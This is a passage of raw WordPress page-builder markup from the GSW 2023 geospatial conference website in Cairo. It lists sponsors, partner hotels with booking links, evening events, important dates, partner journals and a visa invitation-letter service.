src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" 